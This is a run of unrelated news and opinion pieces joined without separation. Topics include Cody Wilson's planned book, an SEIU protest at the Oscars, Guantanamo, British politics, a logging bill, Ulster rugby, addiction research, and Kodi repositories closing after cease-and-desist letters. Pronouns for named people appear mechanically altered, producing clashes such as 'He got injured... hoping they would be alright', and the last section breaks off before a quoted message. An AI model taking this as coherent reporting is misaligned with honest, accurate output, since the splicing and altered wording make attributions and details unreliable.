The book's working title is Negative Liberty, Wilson says, based on a principle of freedom from external restraints in libertarian political theory.
"The whole point to me is to add to the hacker mythology and to have a very, very accurate and contentious portrayal of what we think about the current political situation, our attitude and political orientation, a lasting remark," they say. "It won't be a manifesto. But culturally I hope to leave a couple of zingers...a touchstone for the young, disaffected radical towards their own political and social development, that kind of thing."
Wilson says their proposal received highly mixed reactions from publishers, some of whom saw their attempts to create new ways to circumvent gun control laws as immoral. "It was pretty hot and cold," they say. "Some think I'm awful, that what I did was terrible, and others think this is an incredible story that needs to be told."
Wilson first announced their intention to create a fully 3D-printable gun in August of 2012, describing it as a demonstration of government's inability to regulate guns and other types of commerce in an era of distributed manufacturing and ubiquitous communication. In May of 2013 I watched as they hand-fired the world's first fully 3D-printed weapon, which they called the Liberator, for the first time. Just days later, the State Department demanded that they take the blueprints for the Liberator off the Internet, citing potential violations of weapons export restrictions--a legal debate that has yet to be settled.
More recently, Wilson has focused instead on Bitcoin, working with a group of anarchist developers known as UnSystem to build a piece of software for the anonymous spending and receiving of bitcoins called Dark Wallet. But Wilson, who was until recently a law student at the University of Texas, expects that they may soon be embroiled in a legal battle with the government over their firearm 3D-printing project.
"At least now if I'm in prison I'll have something to do," Wilson says, mostly joking. But they add, more seriously, that they may need the book's advance to fund a court battle they anticipate over their publication of the Liberator file. "In the worst case, I can at least bankroll my own legal defense."
–
Follow me on Twitter, email me, anonymously send me sensitive documents or tips, and check out my book, This Machine Kills Secrets: Julian Assange, the Cypherpunks, and Their Fight to Empower Whistleblowers.
Looking for news you can trust?
Subscribe to our free newsletters.
The Oscars air Sunday, but this year, the stars of the silver screen will be faced with picket lines and protesters.
That's because the Service Employees International Union (SEIU), which represents 2.1 million service workers around the world, plans to protest the Academy's decision to hire Security Industry Specialists (SIS)—a company the union accuses of sexual harassment, racial discrimination, and worker intimidation—to provide security for awards night. (The company denies the allegations.)
“We don't think [the Academy] should be using a company that has this kind of record,” SEIU campaign director Sam Kehinde explains. “All we are trying to do is make sure the public knows about it and the client knows.”
SEIU activists bearing banners and signs voiced their concerns at last week's Nominee Lunch in Beverly Hills, but they were unable to relay their concerns to Academy representatives. Now, Kehinde says, the union is back for round two.
Over 100 SEIU activists—including current and former SIS employees—will converge near the Dolby Theatre on Friday afternoon in the hope of attracting attention from the public and entertainment industry officials who will be on site preparing for Sunday's event, Kehinde says. The protesters plan to follow up with a smaller protest on Sunday, when it will be more difficult for a large group to gain access to the area.
Daivon Young, an SIS security specialist assigned to Amazon, is traveling all the way from Seattle to participate in the protest. They say they are scared about their job security and how they will be treated after speaking out against SIS, but “it is the right thing to do.”
Young has been an SIS employee for a year and a half and works at the high-security buildings. Though they are considered a specialist, they make $15.50 an hour and is given 36 hours a week. They say they think the wage is good but many employees are only offered part-time work.
As the sole breadwinner supporting their three-month-old son, Malachai and their wife, Lavicy, Young's concerned. “It is important for me to be able to provide for my family,” they say. “Me, growing up, I didn't have a mom. I didn't have my dad. Putting a roof over my son's head—it means everything to me.”
Young describes the pressure they feel at work and says the simplest mistake will result in termination.  They are often fearful about being penalized and says they feel belittled by their employers. Provoked by these concerns, they turned to the internet. “I wanted to look up reports about SIS,” they explain, “to see if the same things were going on somewhere else.” They landed on their “Union Facts” page, meant to derail and disprove the accusations SEIU laid against SIS. “It started naming all these things and, in my head I am thinking, ‘You do do that!” Young exclaims.
They say they had never considered the union before then and had been told explicitly as an employee they should not become involved with SEIU. “I understand now why we need a union,” they add. This is why they hope their participation in the protest will make a difference.
Tom Seltz, copresident and CFO of SIS, says the union's allegations are unsubstantiated. They see the Oscar protests as a form of harassment—a ploy for union officials to collect more money.
“I think the union is looking for dues and I don't think there is much they can promise our employees that they aren't already getting,” they say. “I don't think there's anything they can promise.”
Seltz says unions are unnecessary and says they see no need for their employees to join. They emphasize that it is still up to workers to make up their minds and denies claims that their company has used intimidation tactics to deter union involvement.
SIS pays employees higher than the average hourly wage for the industry, but only half of SIS workers are full time and receiving benefits. Seltz says this has more to do with the nature of the work and client needs than company policy, and that many SIS employees are off-duty police officers who can only work part-time or are hired to work temporarily for specific events.
But Steve Amitay, the executive director of the National Association of Security Companies, says the industry norm is to employ workers full time. “Currently the majority of security officers at most contract security companies are full-time employees,” they explain via email. Though Amitay acknowledges that there are instances when part-time work is warranted, they say that “some companies believe that the offer of part-time employment may deter the best job candidates and work against creating a dedicated and experienced workforce.”
Daivon Young says they hope their presence at this weekend's protest will help convince their company to be more supportive of unionization. “All I want done is for SIS to allow us to have a union,” they say. “We aren't asking for extra mayonnaise and extra pickles. We just want to be treated right.”
GEELONG ruckman Dawson Simpson has been charged with drink-driving after they were pulled over by police on Saturday night.
The Cats released a short statement on Sunday night confirming the 206cm big man had been charged with drink driving.
The club is in the process of gathering the relevant details before deciding on an appropriate sanction, while the Transport Accident Commission and the AFL have been made aware of the incident.
The Geelong Advertiser reported Simpson allegedly registered a blood-alcohol reading of 0.1 - double the legal limit - when they were tested in Geelong West about 11.30pm on Saturday night.
The TAC also released a statement later on Sunday night, expressing disappointment at Simpson's actions.
"The TAC can confirm that the Geelong Football Club informed us today that one of their players was caught drink driving yesterday," the statement said.
"The TAC is extremely disappointed with the news. We will await further discussion with the football club before making any further comment."
Simpson underwent a third bout of back surgery in August, ruling them out for the rest of the season.
After managing 13 games in 2014, Geelong is hopeful the 25-year-old will come through the surgery and get back to playing AFL next season.
But if their body does not respond to this latest operation, the club is fearful that their career could be thrown into jeopardy.
Geelong's season ended in disappointing fashion on Friday night after a six-point loss to North Melbourne in the second semi-final at the MCG - the club's second successive loss in this year's finals series.
Washington: The Obama administration is not pursuing the use of an executive order to shutter the Guantanamo Bay military prison after officials concluded that it would not be a viable strategy, sources familiar with the deliberations said.
The conclusion, reached by administration officials, narrows the already slim chances that President Barack Obama can fulfil their pledge to close the notorious offshore prison before leaving office in January.
The White House has said repeatedly that Obama has not ruled out any options on the Guantanamo Centre, which has been used to house terrorism suspects since it was set up in 2001 following the September 11 attacks on New York and Washington.
Obama is eager to fulfil their 2008 campaign pledge to close the prison and could still choose to use their commander-in-chief powers, but the option is not being actively pursued, the sources said.
Without executive action, the chances of closing the prison would hinge on convincing a resistant Congress to overturn a long-standing ban on bringing possibly dozens of remaining prisoners to maximum-security prisons in the United States.
White House lawyers and other officials studied the option of overriding the ban but did not develop a strong legal position or an effective political sales pitch in an election year, a source familiar with the discussions said.
“It was just deemed too difficult to get through all of the hurdles that they would need to get through, and the level of support they were likely to receive on it was thought to be too low to generate such controversy, particularly at a sensitive [time] in an election cycle,” the source said.
Transfers
Republicans in Congress are opposed to bringing Guantanamo detainees to US prisons and have expressed opposition to transfers to other countries over concern that released prisoners will return to militant activities. They have vowed to challenge any potential Obama executive action in court.
At its peak, the prison at the US naval base in Cuba housed nearly 800 prisoners, becoming a symbol of the excesses of the “war on terror” and synonymous with criticism of detention without trial and accusations of torture. Obama has called it a recruitment tool for terrorists.
The number of Guantanamo detainees has fallen to 80 now, the lowest since it was opened.
The administration is focusing on getting the number of detainees at the prison down to such a low number, perhaps 20, that the cost of keeping it open could prove unpalatable to Congress. Republican lawmakers remain unswayed.
The Guantanamo prison and associated military commissions cost $445 million (Dh1.66 billion) in fiscal year 2015. That works out to more than $5.5 million a year for each of the 80 remaining prisoners.
Thirty of the remaining detainees at Guantanamo have been approved for transfer to foreign countries and the State Department says it will move all of them out this summer. Those who would be left include 10 being prosecuted in military commissions, and other detainees deemed too dangerous to release or transfer.
“The administration's goal is to work with Congress to find a solution to close Guantanamo,” said Myles Caggins, a spokesperson for the White House National Security Council.
They said the government had made “substantial progress” moving prisoners to foreign countries and was working to identify more countries for additional transfers. Reviews to determine whether certain prisoners need to remain detained to prevent a threat to US security had been accelerated and would be completed in the coming months, they said.
Obama, who issued an order to shut the prison within a year on their first day in office, released their latest plan to close it to Congress in February, but it has not gained traction.
The White House has not publicly ruled out the executive order option in part to keep pressure on the Pentagon to move prisoners who have been cleared for release to other countries, one of the sources said.
“If Congress … would finally say no to the president's plan and the executive order option wasn't on the table, there was a concern that the wheels could grind to a halt,” said the source familiar with discussions at the White House.
Gregory Craig, who served as Obama's first White House counsel, said that without an executive order, Obama would likely need the cooperation of Congress to shut down the prison.
“I think the odds are probably challenging,” Craig said.
With the Prime Minister caught behaving like a cross between Richard Nixon and Inspector Clouseau, the path to the next election is clear. It will be difficult for David Cameron to win an overall majority, although I maintain, as I have done since Gordon Brown became Prime Minister, that the Tories will do it. But if, by next June, Cameron cannot at least ensure the Conservatives are the largest party in the Commons, then they will not have been trying very hard.
In that context, today's ICM poll for The Sunday Telegraph , the first in the wake of the McBride email imbroglio, is devastating for Brown. It shows Labour sinking back to 26 points, 17 behind the Tories on 43. The government is dying. That would be fine if it was only Gordon Brown's own private nightmare, but it's not: we're all involved and the country is getting absolutely stuffed in the process.
In the circumstances, amid the growing stench of decay and distrust, the task facing any incoming government looks virtually impossible. There is such a feeling of disgust with the political class that no new government can expect to begin its work with much swelling of good will. Indeed, Cameron judges that they will be allowed only the briefest honeymoon even if their campaign trumpets a time for change. Yes, yes, of course it's time for a change, one imagines the voters saying wearily, but don't you lot always say that?
There is a widespread belief that, irrespective of party, our masters are expert only at claiming their expenses and knifing each other. Government is judged simply not to work.
Cameron's first task on entering Number 10 is to change that, quickly, and in a way clearly understood by a sceptical public. If they are to secure the time and leeway to get anything serious done in office, such as education reform, the first essential will be a quiet revolution in how Britain is governed. Gordon Brown talked of this on becoming a Prime Minister, but you needed your head examined if you thought they were serious about doing anything more than saying it.
Brown is the great centraliser, and Whitehall doesn't work properly largely because of what they and Tony Blair did to it as they built their rival camps. Brown's Treasury assumed too much power over other departments. They envisioned themselves controlling the economy and domestic policy, while the PM would be left with international affairs, soundbites about the deaths of Diana and Frank Sinatra and other aspects of public relations.
Foolishly having agreed to this without understanding the implications, Blair realised that they had to respond. Out of the Cabinet Office they built a large team working for them – effectively a department of the PM – to compete with their Chancellor. Management consultants and assorted "gurus" (Lord Birt of the BBC, for goodness sake!) were given desks in Number 10 or beyond and drew charts of how government and the country could be made to work efficiently.
It was quite mad and the results have been disastrous. Cascading from these rival operations came competing targets and endless "eye-catching initiatives" which cost much but achieved little. Most members of the Cabinet were not really masters in their own departments. They simply counted the days between counter-productive interventions by one or other arm, or both, of the controlling centre.
And so, despite attempts by Brown to show that this is no longer the way they work without Blair around, the McBride affair showed again that control is the dominant component in Brown's DNA. Their henchmen's response to the challenge of the internet and blogging is instructive. They increase freedom and limit the possibility of centralised control, but Team Brown thought they could shape this new life-force from a bunker in Number 10.
The Tories, by contrast, need to govern quite differently; copying New Labour's approach would be deadly.
So far the signs are encouraging. A member of the shadow cabinet says: "In the 1980s you had about a dozen people working in Downing Street for Margaret, with their private office and the policy unit. That's all. You don't need a strong department of the prime minister. You need a strong PM who sets a clear direction and lets good people get on with it."
Likewise a Tory aide says: "David is simply not a control freak." As for the battered Civil Service: "there are good people, who need to be led."
That's a start, but it will hardly convince the public. For attitudes towards government to improve even a little, there must be a more extensive and dramatic programme of reform. The number of ministers must be sharply reduced – and Cameron is preparing to do this. There need to be far fewer special advisers, particularly at the centre of government. There is a Tory plan emerging to reduce the number of MPs – a long overdue reform.
All that is commendable. But the test will come when Cameron crosses the Downing Street threshold. Can they resist the lure of gimmicky Blairite initiatives? Can they admit, unlike the incumbent, that they cannot control everything? They should try.
Rep. Henry Waxman
In 2013, the Republican-led House voted for the anti-environment position 109 times. House Republicans voted to block actions to improve air quality and cut carbon pollution; to expedite oil and gas drilling off America's coasts and on onshore federal lands; to slash funding for renewable energy and energy efficiency programs; to block federal efforts to improve water quality; and to allow more logging and mining on federal lands with limited environmental review.
The 112th Congress was labeled two years ago the most anti-environment in the history of the House of Representatives by Democratic Rep. Henry Waxman of California and then-Rep. Ed Markey of Massachusetts. But a new report from Waxman's office has found that the 113th Congress may turn out to be worse if its second half matches its first.Unfortunately, on at least one issue on that list, oil and gas drilling, the White House has—to state it generously—been far from exemplary. But unlike the Obama administration, House Republicans have zero to boast about on the eco-protection side of their ledger. Their attack on the environment has been broad-based. According to the Waxman report, House Republicans voted:
• 51 times in favor of the interests of the oil and gas industry including fast-tracking pipeline construction and putting up obstacles to developing cleaner alternatives to oil.
• 37 times to weaken the Clean Water Act and to block funding to implement the National Ocean Policy.
• 27 times to cut spending on clean energy and energy efficiency.
• 20 times to weaken the Clean Air Act.
• 20 times against efforts to curb carbon pollution.
With an extremist majority of the House Republican caucus firmly in the denier camp on climate change, and determined to undercut any environmental protections that don't have a direct impact in their own back yard, the count of obstructive votes is hardly a surprise.
Also no surprise is that too few House Democrats have shown the environment to be a high priority of theirs. For instance, only 33 Democrats are members of the Safe Climate Caucus led by Waxman. Members have pledged to speak out every day on the need to deal with climate change:
What unites us is our understanding that climate change is the moral issue of our time. We believe we have an obligation to use our voices to raise awareness of the dangers we are creating for our children and grandchildren if we do not act now.
There are 167 Democrats missing from that caucus. If they really want to distinguish themselves from the know-nothing right-wingers highlighted in Waxman's report, they should make it a point to sign up.
After successfully defending MuckRock's First Amendment right to host public records on its website earlier this summer, EFF filed documents in court on Monday seeking to end the last lawsuit brought against it in Seattle.
The lawsuit was one of three filed by companies against MuckRock, one of its users, and the city of Seattle after the user filed a public records request in April seeking information about the city's smart utility meter program, including documentation of the technology's security.
The lawsuits were all aimed at preventing disclosure of records the companies claimed contained trade secrets. In one of the cases, a company obtained a court order requiring MuckRock to de-publish two documents from its website that the city had previously released. A court quickly reversed that clear violation of MuckRock's First Amendment rights and MuckRock put the public records back online.
After the dust settled, companies in two of the lawsuits agreed to dismiss MuckRock. This occurred after EFF explained that the website is an online platform that hosts its users public records requests and any documents they receive. As such, MuckRock did not actually request the records subject to the lawsuits and merely facilitated and hosted the request by its user.
MuckRock thus has no particular interest in the lawsuits because the underlying dispute is about whether certain documents contained trade secrets that must be redacted or withheld under Washington state's public records law.
The company in the third case, however, has refused to dismiss MuckRock. This is particularly curious because MuckRock currently does not host any documents from the company, Elster Solutions, LLC, that are subject to the public records request.
EFF's motion asks the federal court hearing the suit to dismiss MuckRock for two reasons.
First, the motion argues that Elster has failed to allege that MuckRock has done anything wrong that would make it subject to the lawsuit.
Second, the court cannot entertain any claims against MuckRock because it is immune from suit under 47 U.S.C. § 230, a provision of the Communications Decency Act (often referred to as Section 230).
Section 230 provides broad protections for online platforms such as MuckRock, shielding them from liability based on the activities of users who post content to their websites. Given that broad immunity, MuckRock cannot be sued for hosting public records sought by one of its users regardless of whether they contain trade secrets.
We are hopeful that the court will dismiss MuckRock from the suit and allow it to focus on maintaining and improving its online public records platform. EFF also thanks our local counsel, Venkat Balasubramani of FOCAL PLLC, for their assistance with the motion.
Speaker Paul Ryan Paul Davis RyanBrexit and exit: A transatlantic comparison Five takeaways from McCabe's allegations against Trump The Hill's 12:30 Report: Sanders set to shake up 2020 race MORE (R-Wis.) on Tuesday said Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say they should get less than 10 years in prison MORE “met expectations” at Monday's presidential debate but declined to comment on the Republican nominee's new attacks on a former Miss Universe winner who they said was “the worst” because they “gained a massive amount of weight.”
The Speaker's advice for Trump over the weekend had been this: overprepare.
ADVERTISEMENT
Based on what Ryan observed, Trump had passed the test.
“I think people met their expectations. And I think Hillary gave a very polished, well-rehearsed defense of the status quo, and I think Donald Trump gave a unique Donald Trump response to the status quo," Ryan said.
“I think they gave a spirited argument and I think they passed a number of thresholds — that for 90 minutes they can go toe-to-toe with Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesperson: Clinton staff are 'biggest a--holes in American politics' MORE.”
Ryan, a fitness fanatic, said they were too busy Tuesday morning exercising and working to have caught Trump's interview on Fox News about former Miss Universe Alicia Machado.
Toward the end of Monday night's debate, Democrat Hillary Clinton reminded voters that Trump has often criticized the appearance of women, once calling Machado “Miss Piggy.”
Trump doubled down in a Fox News interview early Tuesday morning, continuing to insist that Machado had “gained a massive amount of weight, and it was a real problem.”
“I'm not going to get into the ‘who said what' this morning on some talk show because I didn't see it,” Ryan told reporters in the Capitol.
Stated purpose: “...to expedite salvage [logging] and reforestation projects in the Columbia Gorge National Scenic Area and other National Scenic Areas…”
Actual purpose: Suspending, in perpetuity, environmental protection laws, avoiding accountability, and restricting the rights of US citizens, in order to fast-track clearcut logging of National Scenic Areas recovering from any fire, snow, high water, wind or other natural event, regardless of severity.
Key aspects of Walden's Columbia Gorge Clearcut Act:
1. Forces the Secretary of Agriculture to rush post-fire “salvage” logging projects to conclusion within National Scenic Areas with reduced or eliminated environmental analysis and protections for endangered species. Such projects typically involve clearcutting both live and dead trees, and re-planting only species of commercial value to logging interests. Makes no mention of genuine restoration (stabilizing roads and trails, preventing erosion, protecting drinking water, etc…)
2. Makes no mention of climate change, and requires no consideration of how logging in areas recovering from fire could affect carbon and climate. It does nothing to address the reality that climate change will lead to hotter, drier summers and longer fire seasons.
3. To justify post fire logging, Walden utilizes the term “catastrophic events” and “natural disaster” to describe fire, snow, high water, wind, and other natural processes with no differentiation between severity or actual effect on the land. As has been well established by decades of science, including the spectacular recovery of Yellowstone National Park after the 1988 fire, many of these processes are beneficial and desirable for maintaining the health of public lands.
4. Specifically targets National Scenic Areas (including the Columbia Gorge) for post-fire logging, which typically includes clearcutting, of areas up to 10,000 acres in size.
5. Rush to log. Requires the Secretary of Agriculture to propose “response activities” in National Scenic Areas within 30 days after the “conclusion” of fire, snow, high water, wind, or other events for lands “adversely impacted” by such events. Provides no definition of the terms “response activities,” or “adversely impacted” (though in context response clearly means commercial logging). Secretary would be legally required to propose logging within 30 days after the “conclusion” of an event, regardless of how much information is available on the effects of a given event.
6. Reduce or eliminate public review and input. Exempts post-fire logging in National Scenic Areas from traditional public input requirements under the National Environmental Policy Act. No requirement for agencies to meaningfully consider public input or objections, or to modify projects based on public objections.
7. Rushed or no environmental review. Allows the Secretary of Agriculture to utilize a “categorical exclusion” to avoid environmental analysis of the effects of any post-fire (or other event) logging project up to 10,000 acres in size inside a National Scenic Area that meets certain criteria. If they do not meet those criteria, environmental analysis must be completed within 60 days after the “conclusion” of fire, snow, high water, wind, or other “catastrophic” events or the logging may proceed regardless.
8. Eliminates endangered species protections. Allows the Secretary to “self-consult” on whether post-fire logging may harm salmon or other endangered species. No further scientific review is required. If the Secretary deems it necessary to consult with salmon or wildlife biologists, such consultation must be complete within 90 days of the request being made. If it is not, the logging is deemed to have no impact on endangered species. Unlikely such consultation would be complete in time for the public to consider it during the small comment and objection period. Fish and Wildlife Service and National Marine Fisheries Service waive their rights to consult if the process takes more than 90 days.
9. Limits the public's legal rights. In cases where citizens challenge post-fire logging projects, including clearcutting, in National Scenic Areas HR 3715 specifically prohibits judges from granting restraining orders and injunctions to stop logging projects should they deem them likely to violate the law. It restricts the right of Americans to challenge their own government, and prioritizes rushing commercial logging projects over the conservation in National Scenic Areas.
10. Requires the Secretary of Agriculture to have “reforested” at least 75% of “impacted” lands within 2 years. No definition of “impacted,” no exception for areas that burned lightly or not at all, no requirements regarding native species use in planting, and no consideration of the impacts such actions would have on wildlife that utilize snags and dead wood. This provision would convert diverse, native forest in National Scenic Areas into industrial logging plantations.
Ulster sweat over fitness of key trio ahead of Leinster clash BelfastTelegraph.co.uk Ulster will not know until later this week if their bruising Champions Cup encounters mean they are to be without a key trio of players for Saturday's sold-out inter-pro with Leinster at Kingspan Stadium (6.30pm kick-off) back in the Guinness PRO14. https://www.belfasttelegraph.co.uk/sport/rugby/ulster-rugby/ulster-sweat-over-fitness-of-key-trio-ahead-of-leinster-clash-36256984.html https://www.belfasttelegraph.co.uk/sport/rugby/ulster-rugby/article36256983.ece/ccdd9/AUTOCROP/h342/2017-10-13_spo_35379605_I1.JPG
Email
Ulster will not know until later this week if their bruising Champions Cup encounters mean they are to be without a key trio of players for Saturday's sold-out inter-pro with Leinster at Kingspan Stadium (6.30pm kick-off) back in the Guinness PRO14.
While the return of skipper Rory Best in last weekend's loss to La Rochelle provided a considerable boost, the physical toll of that contest saw the side return to training yesterday with question marks over tight-head Wiehahn Herbst and half-back duo Christian Leali'ifano and John Cooney.
Battling a calf complaint, South African Herbst is seen as something of a long shot to feature in a set-piece battle that would see them go head-to-head with Lions loose-head Jack McGrath at the weekend.
With Ross Kane only working their way back at All-Ireland League and Ulster 'A' level over the last number of weeks after injuries of their own, Rodney Ah You could be left with a sizeable load to carry.
Scrum coach Aaron Dundon said: "Wiehahn Herbst came off with a tight calf so we'll see how they pull through and Christian Leali'ifano is also a bit tight and sore. Obviously they were out of rugby for a while and they have been playing a lot of minutes lately, so there is a bit of fatigue there, a bit of tiredness too, so we're trying to manage them as best we can.
"We'll just see how they pull through and John Cooney took a knock to their chest, so we're hoping to know later in the week with them too."
Loosehead prop Kyle McCall, who was named to be on the bench against La Rochelle but pulled out prior to kick-off, also remains a fitness doubt ahead of this week.
"He got injured in a scrummaging session on Thursday," added Dundon. "We didn't think it was too bad and were hoping they would be alright, so we brought them anyway.
"The doctor with us and physio got them as much treatment as they could, but they just felt at the end of the day they were not able to give 100%.
"We had Andy Warwick who was travelling anyway and we made a decision to play him.
"Hopefully Kyle will be alright this week, it's a seven to eight days sort of injury so hopefully they will pull through.
"We will not be able to make that decision either until later in the week."
There was better news on Louis Ludik and Jean Deysel, though, after both trained yesterday despite missing the trip to La Rochelle.
Meanwhile, Ulster's first ever PRO14 game in South Africa will now take place in more modest surroundings.
Originally scheduled for the 46,000-seater Nelson Mandela Bay Stadium, the province will instead play the Southern Kings at Wolfson Stadium.
With the hosts only drawing in the region of 4,000 fans so far, and Ulster set to be shorn of their Ireland internationals for the trip to Conference B's bottom side, a spectacle is not expected.
The draw for the Millar McCall Wylie Junior Cup semi-finals was made at Kingspan Stadium yesterday with Ballymoney just one win away from a first ever final in the competition.
They will play City of Armagh II in the last four, with holders Ballynahinch II hosting the winner of Portadown v Malone II after their quarter-final was postponed thanks to an injury to the referee on Saturday.
Belfast Telegraph Digital
People generally look at addiction in one of two ways. Some understand the extreme difficulty inherent in battling a craving, whether it be for drugs, food, cigarettes, etc. This is especially the case with those who have experienced addiction, and to a lesser extent with those who have helped someone else through it or studied it extensively. Others may attribute addiction to a personal choice, as if a drug user is able to simply sit down and decide whether or not they or they want to do drugs today, and then acts on that decision.
The science doesn't support the latter view. A number of neuroimaging studies demonstrate abnormal activity in the brains of drug addicts. This aberrant activity can involve decision-making areas (pre-frontal lobes), areas correlated with compulsive behavior (anterior cingulate and orbitofrontal cortices), and reward processing centers (mesolimbic dopamine pathway and limbic system). Now consider the genetic influences on tendencies toward addictive behavior and it begins to seem that, if a personal decision is involved, the deck is stacked pretty heavily against an addict making the right one. Drawing an analogy of addiction to personal choice is like telling someone who is clinically depressed they just need to “snap out of it”.
Recent research by a group at University of Pennsylvania has shown addiction to be even more difficult to overcome than previously thought. The group used functional MRI (fMRI) to study brain activity in cocaine-addicted patients as they viewed images with different themes. Some pictures were drug stimuli (e.g. a crack pipe), others were sexual in nature, and the rest were either aversive (i.e. involving pain) or neutral. The images were flashed on a screen for 33 milliseconds, and then immediately followed by another image used to distract the participant and ensure the first picture could not be registered—a technique known as backward masking. Previous studies have shown that this procedure results in participants not consciously recognizing the content of the more briefly displayed image.
The patients exhibited brain activity consistent with drug craving when the drug images were shown, even though the images didn't seem to be consciously processed. This activity occurred throughout limbic structures previously implicated in reward and drug addiction, such as the striatum, amygdala, orbitofrontal cortex, insula, and prefrontal cortex. The activity was similar to that which occurred when the sexual images were viewed.
The Penn research group has hypothesized that the recognition of the drug cues is the result of pure Pavlovian conditioning. According to this view, drug craving becomes a learned reflexive response. With exposure to relevant stimuli, its onset is automatic. The group also suggests that the similarity between how the drug stimuli and sexual stimuli were processed indicates these patients' brains are viewing drugs in the same way they are viewing biologically rewarding stimuli. Many scientists believe our brains have evolved to view life-promoting goals like procreation and food as rewarding because they are essential to our survival as a species (thus the desire to achieve them was naturally selected for). It seems drugs can hijack the brain's reward circuitry and convince it drugs are as important as the rewards we have been genetically programmed to pursue. This presents a grim picture of addiction. In my opinion, however, studies such as this one are important in coaxing our society to view addiction as a disorder that requires treatment, instead of a social stigma or a behavior that in and of itself necessitates incarceration.
Popular Kodi repositories NoobsandNerds, Teverz, SpinzTV and others received cease and desist orders today and have taken down their repos in the latest wave of attacks on Kodi developers. Read the full details below.
Unfortunately, more popular Kodi sources were hit with cease and desist letter today from ACE, a company representing multi-billion dollar communications entities around the world. These letters were identical to what was received by the Colossus, Dandy Media, Mucky Ducky, and other repos back in November.
The cease and desist letter alleges that the defendant receiving the letter is encouraging copyright infringement through the addons. The letter does not appear to be a signed legal document. There is no signature from a lawyer and no law firm is listed on the letter. It simply asks each use to “stop” or be faced with further punishment.
Below is a summary of who we know was contacted and the current response by those people.
Looking Glass Repo
Gracie, leader of the Looking Glass Repo, also received a letter from ACE. The Looking Glass Repo has since gone offline. There were multiple developers contributing to Looking Glass and it is unsure if they received anything or will be rebranding into something else in the future.
The Pyramid
The creator of The Pyramid Kodi addon has shut everything down after a visit to their home from an ACE representative. Their addon and also some Kodi builds tied to their name (Tomb Raider Builds) have been removed from the internet.
Teverz Repo
Teverz is a Youtube video maker who has their own wizard for Kodi builds.  They are not an addon developer to our knowledge. Teverz received a letter and talked to the person on the phone via the number supplied. So far, Teverz is keeping everything online, calling the letter nothing but a “scare tactic” without any sort of legal weight.
Doggmatic
Doggmatic is a Kodi youtuber and build maker. Like Teverz and Blamo, it appears that they are not going anywhere and will not be intimidated by the letter.
Noobs and Nerds Repository
One or more members of the Noobs and Nerds repository also received letters today and as of this post, the official NoobsandNerds website leads to a suspended account message. The NaN repo has been pulled offline.
OpenELEQ, one of the developers with Noobs and Nerds, posted the following on Twitter:
You probably all seen it allready: Nan-site is offline as is their twitter. It does not look like it will be comming back either and I have also emptied out my repo's of all content that could be considered copyright-infringing. I will be keeping my git-account alive though simply to avoid it being high-jacked, nothing else. Also, if you see claims in the future that I or Nan endorses TVA (similar to what happened to Xunity), do not believe it as that will never ever happen!
SpinzTV Repository
SpinzTV, one of the most popular Kodi builds on the internet and their repository also hosted the Cartoon Crazy and Strictly HD addons. As of today, their repo is offline and they have stated that they are finished with Kodi for now.
Blamo Repo
Blamo, the developer behind Placenta, Neptune Rising, and Death Streams, did NOT receive a letter from ACE. However, they have pulled their repository location and moved it to a new server. They have stated that they are taking a break from Twitter temporarily because they “has some stuff to take care of and some projects to do”.
Note that the Blamo Repo will have a failed repository update the next time you launch Kodi due to the server change. In order to fix this, manually install the Blamo Repo from their repo source and make sure you are installing v0.0.6 or higher.
Just a reminder, Kodi addons don't store any content of their own. They are simply search engines into the public internet.
___
Original Post:
Warning to all Kodi Users
As you read the updates below to some of your favourite Kodi addons, we want to caution you against installing new and unknown repositories. Some people have setup new repositories to host some of the addons below without any programming knowledge or permission from the original developer. The only person who should advertise a new version of Covenant, for example, should be the existing Covenant developer.
Colossus Repo Gone
Around 1pm EST on November 15th, the Colossus Repo went offline, taking with it a ton of Kodi addons and dependencies such as URLResolver, Covenant, Bennu, and more. Accessing the official Colossus Github Page shows no repositories listed. The GitHub page was the only official method for accessing the addons and repository and was constantly being updated before it went down.
Multiple users in the repo were contacted with a cease and desist order from the MPAA, where they called them responsible for promoting piracy via their addons in their repositories. A quick reminder that Kodi addons do not host any content and simply act as search engines to the public internet.
Smash Repository
The Smash Repository has gone offline. Smash confirmed that they will be moving away from Kodi addons and focusing on a new venture in the future.
Shani_01 / ZemTV Developer
Coincidentally or not, Shani_01, the developer of ZemTV who was named in the Dish Network lawsuit along with TVAddons, also reappeared today on Twitter. Shani pledged that they wanted to fight and clear their name to support all Kodi developers who haven't done anything wrong and are being targeted by large companies.
Shani also posted a link to a GoFundMe page to raise money for legal fees, which was mistakenly taken down by GoFundMe for violating terms and conditions; they thought Shani was raising money for a criminal court case, which they were not.
As soon as Shani reposts their fundraising campaign, we will pass that information along to everyone.
URLResolver
URLResolver is an important Kodi dependency that resolves links from a wide list of file hosting websites. URLResolver was previously hosted and developed through the Colossus GitHub, which no longer exists.
Since this original post, URLResolver has since been hosted on the TVAddons GitHub page. In addition, a spinoff fork called ResolveURL has been released, which includes fixed and updates to resolver file lockers.
DandyMedia Repo & Addons
DandyMedia has taken their repository offline, which included popular Kodi addons such as Myriad, 1080p, Openload Movies, and others. A Twitter message from @noobsandnerds said the following:
You may notice that from today our repository looks a little smaller. DandyMedia is taking a little bit of Gardening Leave. # DontPanic
DandyMedia's Twitter account has also been deactivated as of this time. There is no indication that Dandy received any threatening letters at this time. Just a reminder to NOT uninstall Dandy's addons if you have them installed.
Project D
Project D was a popular playlister in the Bennu Kodi addon. According to Twitter, they have joined the Looking Glass team. As of right now, they do not have an addon in the repo but if and when something if released, we will pass that information on.
Caz_Wallace Wizard / Repo
Caz Wallace, a popular Youtube video creator who also had a wizard for installing Kodi builds, announced on Twitter that they received a letter from the MPAA warning them against support for any “grey area” Kodi addons.
They announced on Twitter that we will only host legal addons from now and will not have a wizard any longer.
Pulse Build / Wizard
A few of our followers have contacted us to say that upon launching their Kodi box with the Pulse build installed, a popup has let them know that Pulse is going offline and will no longer be maintenance. There is no word whether the Pulse team also received a formal letter warning them or if they are simply going offline as a precaution.
Mucky Duck Repo & Addons
On Twitter, Mucky Duck released the following message:
